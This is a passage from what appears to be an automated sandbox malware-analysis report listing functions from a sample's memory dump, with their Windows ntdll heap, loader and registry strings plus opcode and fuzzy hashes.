              Function 01449179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
              • API String ID: 2994545307-3063724069
              • Opcode ID: dd98bd57004843a992c65b2a92de11ecca23545d91531ea4c9d551a671290922
              • Instruction ID: 52ccd32fc9c0b4e5ea16d3f99f73da2fbb9c5f2885a5eae5da7f6c08236d9d7c
              • Opcode Fuzzy Hash: dd98bd57004843a992c65b2a92de11ecca23545d91531ea4c9d551a671290922
              • Instruction Fuzzy Hash: F4D1D672804312AFE721DB58C841B6BBBE8AF9871CF05492EFA4897260D770DD04DBD2
              Function 01460274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
              • API String ID: 0-1700792311
              • Opcode ID: 57093da51908d81df11aaeaa0210e04ba23896f2377dd0e531e55acd8252b015
              • Instruction ID: b9d25775df8f3bec36b9a7d97ee2736350246d0534ea61ce727dd6b9cf81ecd5
              • Opcode Fuzzy Hash: 57093da51908d81df11aaeaa0210e04ba23896f2377dd0e531e55acd8252b015
              • Instruction Fuzzy Hash: 3DD1DD35600686DFDB22DF68C440AAEBFF5FF5A718F48805AF4499B362C7749981CB12
              Function 013AD08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
              Download Yara Rule
              Strings
              • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 013AD262
              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 013AD2C3
              • @, xrefs: 013AD0FD
              • @, xrefs: 013AD2AF
              • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 013AD0CF
              • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 013AD146
              • Control Panel\Desktop\LanguageConfiguration, xrefs: 013AD196
              • @, xrefs: 013AD313
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
              • API String ID: 0-1356375266
              • Opcode ID: 37bcf4e0af278629c74e301bc32e1a45078e4b69ee6170e18d30b21f3c32d20e
              • Instruction ID: 78f246aa82a6b90506e4ca1b8572a988be96393510948816cef293dacddba3ef
              • Opcode Fuzzy Hash: 37bcf4e0af278629c74e301bc32e1a45078e4b69ee6170e18d30b21f3c32d20e
              • Instruction Fuzzy Hash: 84A18E719083069FE721DF69C480B5BBBE8FB94719F40892EFA9897640D774D908CB53
              Function 013AF172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
              • API String ID: 0-523794902
              • Opcode ID: 9fa64a871dd1609ee34004f62048962be7cc86bd9895aaf41e4c19c8bf1064e5
              • Instruction ID: 5a7eeedc4c056a49677285b29cbc0860edfd7d0e9ff3c27184fa8d32ea761be7
              • Opcode Fuzzy Hash: 9fa64a871dd1609ee34004f62048962be7cc86bd9895aaf41e4c19c8bf1064e5
              • Instruction Fuzzy Hash: F5420135208382DFD716DF29C484B6BBBE9FF94608F48896EE4858B3A1D734D845CB52
              Function 013CB1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
              • API String ID: 0-122214566
              • Opcode ID: 650a76e42dca2ef35073c8089afcfd0bed0d6494cea27a289d5038eead138a7f
              • Instruction ID: f28cef6970d6bc2c317879fc0b06dabe901369a6bbaa1bc6bf072f3d5c11422a
              • Opcode Fuzzy Hash: 650a76e42dca2ef35073c8089afcfd0bed0d6494cea27a289d5038eead138a7f
              • Instruction Fuzzy Hash: 9FC15C31A0021A9BDB259B6CC88277FFBA5AF54B48F14406EED05AB799EB74CC44C390
              Function 013E63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
              • API String ID: 0-792281065
              • Opcode ID: 70adba60383f69168338aa6bf0f6c4fe64e78b19432e356e512c424e8f44889b
              • Instruction ID: 1a96a10b67b10378efb5adae298eaf91ef77a47454da24aa39fbc36052c7b2c3
              • Opcode Fuzzy Hash: 70adba60383f69168338aa6bf0f6c4fe64e78b19432e356e512c424e8f44889b
              • Instruction Fuzzy Hash: C8915AB0B00335DBDB25DF19D849BAA7FA5EB61B18F99402EE5007B7E1D7709841CB90
              Function 0145F525 Relevance: 7.7, Strings: 6, Instructions: 231COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
              • API String ID: 0-1745908468
              • Opcode ID: 2b803026aacd427dc479934efa987506601ce2d2a4106db22aa8f475e34228f0
              • Instruction ID: 9dab62ca4a5c76bacf26d2afb6fbe4d4c62ef68161b33ce37624f0d3105b08c3
              • Opcode Fuzzy Hash: 2b803026aacd427dc479934efa987506601ce2d2a4106db22aa8f475e34228f0
              • Instruction Fuzzy Hash: 0E91DC35A00641DFDB12DF69C440AAEBBF1FF59708F58801EE8459B372CB71A989CB12
              Function 013DF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
              Download Yara Rule
              Strings
              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 014202E7
              • RTL: Re-Waiting, xrefs: 0142031E
              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 014202BD
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
              • API String ID: 0-2474120054
              • Opcode ID: 29e83d5a3b1d43d2b23175c35cfb8ee0c85cf13ac9c3b174e13404390dc6151f
              • Instruction ID: 83de9d0a39da752d50b8821818be2ffe1f7f1a867784b3b1dee619b13df22e98
              • Opcode Fuzzy Hash: 29e83d5a3b1d43d2b23175c35cfb8ee0c85cf13ac9c3b174e13404390dc6151f
              • Instruction Fuzzy Hash: 78E1CE316047419FD725CF28D884B2ABBE4BB84328F140A1EF5A6CB7E1D774D986CB52
              Function 013D51EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON
              Download Yara Rule
              Strings
              • Kernel-MUI-Number-Allowed, xrefs: 013D5247
              • Kernel-MUI-Language-Allowed, xrefs: 013D527B
              • Kernel-MUI-Language-SKU, xrefs: 013D542B
              • Kernel-MUI-Language-Disallowed, xrefs: 013D5352
              • WindowsExcludedProcs, xrefs: 013D522A
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
              • API String ID: 0-258546922
              • Opcode ID: 6f15eb89ebfa1fb1d5327868bc776abdaa31a05a5eaa07228821fe2ca64f3861
              • Instruction ID: e891a1605cd543f23a2f73c63a36432a7cfe0b9e3bc267aedeaadc2078d60834
              • Opcode Fuzzy Hash: 6f15eb89ebfa1fb1d5327868bc776abdaa31a05a5eaa07228821fe2ca64f3861
              • Instruction Fuzzy Hash: 8AF14B76D00219EFCF16DFA9D980AEEBBB9FF18654F15406AE505E7210EB709E018B90
              Function 013C70C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
              • API String ID: 0-3178619729
              • Opcode ID: b5c53fcf53e236dc8b2e3f647223f129d2b135b4231df5deb247347d79f4b527
              • Instruction ID: 14a1c7f63cb0c6977ced31bfa0d17ea7b23cc0e679c40c94c9564e806d37dc60
              • Opcode Fuzzy Hash: b5c53fcf53e236dc8b2e3f647223f129d2b135b4231df5deb247347d79f4b527
              • Instruction Fuzzy Hash: 7E139C70A0065ACFEB25CF68C8807A9BBF1BF59708F1481ADD949AB781D734AD45CF90
              Function 013C1070 Relevance: 5.9, Strings: 4, Instructions: 940COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
              • API String ID: 2994545307-3570731704
              • Opcode ID: 93a1c9132689da85042dc49c7e5ec1ee7e2d97695c5e839cc6565ef07c92e837
              • Instruction ID: 2b06aefd3d7bf09cde5da5c72a1693b3e0f9ab5703fd9a403c57dbf48f8a39a1
              • Opcode Fuzzy Hash: 93a1c9132689da85042dc49c7e5ec1ee7e2d97695c5e839cc6565ef07c92e837
              • Instruction Fuzzy Hash: 8C924A71A01229CFEB25CF18C840BAAB7B5BF85718F1581EED949AB352D7309E80CF51
              Function 013BA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
              • API String ID: 0-379654539
              • Opcode ID: b936a69a956a5b809b72d2fcefa2840e337b5b561dc28410621688620a92d8d6
              • Instruction ID: 786604cfd91ef9c855d166213a8a5669a2d7753fcbfdd1baf2431fbf1c35e263
              • Opcode Fuzzy Hash: b936a69a956a5b809b72d2fcefa2840e337b5b561dc28410621688620a92d8d6
              • Instruction Fuzzy Hash: 7AC16A7410878ACFD711CF58C080BAAB7E4BB84708F04496AFA95DBB51F778CA49CB56
              Function 013E8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
              Download Yara Rule
              Strings
              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 013E855E
              • LdrpInitializeProcess, xrefs: 013E8422
              • @, xrefs: 013E8591
              • minkernel\ntdll\ldrinit.c, xrefs: 013E8421
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
              • API String ID: 0-1918872054
              • Opcode ID: 60a4c51c5d86a5d9ba55e73044b4df72b05823da0d8a7976efe0585455cd5f0a
              • Instruction ID: fc50f15fddd6381689740081e8451f6f036be5922e6e8d3ca65fa3d17cf65974
              • Opcode Fuzzy Hash: 60a4c51c5d86a5d9ba55e73044b4df72b05823da0d8a7976efe0585455cd5f0a
              • Instruction Fuzzy Hash: 63919A71908355EFD721EF69CC44EABBAECFF84748F40096EFA8496190E734D9448B62
              Function 013D15F4 Relevance: 5.2, Strings: 4, Instructions: 166COMMON
              Download Yara Rule
              Strings
              • Could not validate the crypto signature for DLL %wZ, xrefs: 0141A589
              • LdrpCompleteMapModule, xrefs: 0141A590
              • minkernel\ntdll\ldrmap.c, xrefs: 0141A59A
              • MZER, xrefs: 013D16E8
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$MZER$minkernel\ntdll\ldrmap.c
              • API String ID: 0-1409021520
              • Opcode ID: 2350c5afb22ee109b0300595628bd2e492c69798f1a8ab3194bd17e834a6f263
              • Instruction ID: dd59d1e7d85cccbe03d09401556700ece48e20e6c2a63ffd0b6011a900c27cc3
              • Opcode Fuzzy Hash: 2350c5afb22ee109b0300595628bd2e492c69798f1a8ab3194bd17e834a6f263
              • Instruction Fuzzy Hash: AB5159726057859BEB22CB6CD944B2A7BE8FF00728F180569FE519B7E6D774E800C740
              Function 014611A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
              • API String ID: 2994545307-336120773
              • Opcode ID: 9ff1f820a6292c3b4af4ee0b317164416f78730fc3ccb45736e1fc1516f628af
              • Instruction ID: a545205f300226bcb3017422fba141c74712ddb47c325805a8e87517c894c6bd
              • Opcode Fuzzy Hash: 9ff1f820a6292c3b4af4ee0b317164416f78730fc3ccb45736e1fc1516f628af
              • Instruction Fuzzy Hash: A231B0B1200241EFD711DB9DC885FA7B7ECEF85A68F14005AF501EB3B1DA70AD85CA66
              Function 013A9148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
              • API String ID: 2994545307-1391187441
              • Opcode ID: 1677e3332cff380c861932ab7df81a34549b205826a95ac1e0b9054741b244fd
              • Instruction ID: e2c26a0bd40074723aac39be112ff0ed10f5ce520e6c03824a9c410e0bcc9a99
              • Opcode Fuzzy Hash: 1677e3332cff380c861932ab7df81a34549b205826a95ac1e0b9054741b244fd
              • Instruction Fuzzy Hash: 2231A636600205EFDB12DB5ACC89F9BBBB8EF45728F544069E915A72A1D770ED80CB60
              Function 013B1460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
              Download Yara Rule
              Strings
              • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 013B1728
              • HEAP[%wZ]: , xrefs: 013B1712
              • HEAP: , xrefs: 013B1596
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
              • API String ID: 0-3178619729
              • Opcode ID: 6b9c469fe76ad2fce12bab4838096023fc8b17a22f16b812a6ba095e58945620
              • Instruction ID: 7698b26bc50173ae5943bb557dc120933699091925f129c4eb911a3da8756332
              • Opcode Fuzzy Hash: 6b9c469fe76ad2fce12bab4838096023fc8b17a22f16b812a6ba095e58945620
              • Instruction Fuzzy Hash: 2CE13730A042459FD725CF2DD4A17BABBF5EF44318F18846EEA96CBA95E734D840C750
              Function 013AA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID: FilterFullPath$UseFilter$\??\
              • API String ID: 0-2779062949
              • Opcode ID: 2a70e88bec6f0a6142f807adca75dd233c7a5a14dcdf3182d5b96f6a036575f5
              • Instruction ID: 5771c9fc42a61e4189008d2b1536b4daba44001371faf4aa269bca735bcbec6d
              • Opcode Fuzzy Hash: 2a70e88bec6f0a6142f807adca75dd233c7a5a14dcdf3182d5b96f6a036575f5
              • Instruction Fuzzy Hash: 2AA15F72911629DBDB32DF69CC88BAAB7B8FF44704F1141EAE908A7250D7359E84CF50
              Function 01437410 Relevance: 4.0, Strings: 3, Instructions: 233COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
              • API String ID: 0-3870751728
              • Opcode ID: 28b4f4fa97b44a2f8edb2f685775d35c8d1a66ee9c4357f0f1f80b2d0e5a7497
              • Instruction ID: e622c4f9aaee351d3d55bcd0182eb4d6a2e84ecf0a1f5ba8d4f18301a7c0a90d
              • Opcode Fuzzy Hash: 28b4f4fa97b44a2f8edb2f685775d35c8d1a66ee9c4357f0f1f80b2d0e5a7497
              • Instruction Fuzzy Hash: 4D914DB0E002059FEB18CF69C490BADBBF1BF98315F14C16AD949AB3A1E7759842CF54
              Function 013E909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID: %$&$@
              • API String ID: 0-1537733988
              • Opcode ID: f61ff5a678931c7b04531980ae8d314a5b26db121936322e7020cb993b9adf88
              • Instruction ID: 509c26e5b42f9c856a8f6d30189ab19e6f820c258323d301fa565cc95dad70fb
              • Opcode Fuzzy Hash: f61ff5a678931c7b04531980ae8d314a5b26db121936322e7020cb993b9adf88
              • Instruction Fuzzy Hash: 5971F17050831A9FCB10DF29C588B6FBBE9FF9461CF108A1EE49A476A1D730D845CB92
              Function 013A758F Relevance: 3.9, Strings: 3, Instructions: 132COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
              • API String ID: 0-1151232445
              • Opcode ID: 5c33975b2ce2cc7662adc5021c9f66da9481cd09960b54ea1779730238cfa973
              • Instruction ID: bc7e30ad3e86468346b658f20fafc0341f43cfb73d81f2af5172ecac6f4ccc08
              • Opcode Fuzzy Hash: 5c33975b2ce2cc7662adc5021c9f66da9481cd09960b54ea1779730238cfa973
              • Instruction Fuzzy Hash: 6141D6703003808FEB26CA5EC0E47BA7BA4DF02258FA8446ED9468B6F6D675D485C752
              Function 0146C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
              Download Yara Rule
              Strings
              • PreferredUILanguages, xrefs: 0146C212
              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0146C1C5
              • @, xrefs: 0146C1F1
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
              • API String ID: 0-2968386058
              • Opcode ID: d44b02483116f3e632dff15b7d50a7a5461e1b599dff7d72af70863989c650a9
              • Instruction ID: a150486e8eb63ff13dc0714f9924d3a23a45c620a103b11abf7f0bcc787cabdc
              • Opcode Fuzzy Hash: d44b02483116f3e632dff15b7d50a7a5461e1b599dff7d72af70863989c650a9
              • Instruction Fuzzy Hash: 09416271E0020AEBDF11DBD8C881BEFBBBCAB14718F14406BEA49A7260D7749A458B51
              Function 01444144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
              • API String ID: 0-1373925480
              • Opcode ID: 8b551baaaf282075f38f594e85aedec1363ccde1b69c85d4464242a5d74af159
              • Instruction ID: 55a1426ecdee01a6f9fa44f7773059998c906e9108f7eef81f3461b12dc79824
              • Opcode Fuzzy Hash: 8b551baaaf282075f38f594e85aedec1363ccde1b69c85d4464242a5d74af159
              • Instruction Fuzzy Hash: AC411371A046488BFB22DBD9C844BAEBBB4FF55384F18045BD901EB7A1D7349901CB11
              Function 013E33A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
              Download Yara Rule
              Strings
              • RtlCreateActivationContext, xrefs: 014229F9
              • Actx , xrefs: 013E33AC
              • SXS: %s() passed the empty activation context data, xrefs: 014229FE
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
              • API String ID: 0-859632880
              • Opcode ID: 4bdfc2a7d2a6ad3ce840957cebfe775435fe21521195deccf9a14efd1068ef75
              • Instruction ID: a5d1b772605d32b2b68bbe22a4bc2d22df90535e58b34c773cf88fb2aa5540f8
              • Opcode Fuzzy Hash: 4bdfc2a7d2a6ad3ce840957cebfe775435fe21521195deccf9a14efd1068ef75
              • Instruction Fuzzy Hash: 2F3116326003269FEB26DF58D884F967BE4BB44728F45846AED04AF791DB71D881CB90
              Function 0143B594 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
              Download Yara Rule
              Strings
              • GlobalFlag, xrefs: 0143B68F
              • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 0143B632
              • @, xrefs: 0143B670
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
              • API String ID: 0-4192008846
              • Opcode ID: ca1b682cb585e2db3857c2decda2643e5573ac5c1685465aba02ae59701088d1
              • Instruction ID: ff315aea19ebb0b12d9e1a52f2adba16e8e9865ffe65c6a80a5e7cfa398064a1
              • Opcode Fuzzy Hash: ca1b682cb585e2db3857c2decda2643e5573ac5c1685465aba02ae59701088d1
              • Instruction Fuzzy Hash: 3A313EB1A00209AFDB10EF99CC80BEFBB78EF48748F14446AE605A7251D7749E04DBA4
              Function 013F1270 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
              Download Yara Rule
              Strings
              • BuildLabEx, xrefs: 013F130F
              • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 013F127B
              • @, xrefs: 013F12A5
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
              • API String ID: 0-3051831665
              • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
              • Instruction ID: 8c2852070cb1bac0ce0e76af1728379211e00c14f92ac1899ed86aabba8271c1
              • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
              • Instruction Fuzzy Hash: 3C317E7290061EEBDF12EB99CC44EDFBFBDEB94658F00442AEA14A7260D730DE059B50
              Function 014320DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
              Download Yara Rule
              Strings
              • LdrpInitializationFailure, xrefs: 014320FA
              • Process initialization failed with status 0x%08lx, xrefs: 014320F3
              • minkernel\ntdll\ldrinit.c, xrefs: 01432104
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
              • API String ID: 0-2986994758
              • Opcode ID: 2b9a557a82f890365b654b6d2082ea2bf7b50d718ce48c9bb448b0615042058f
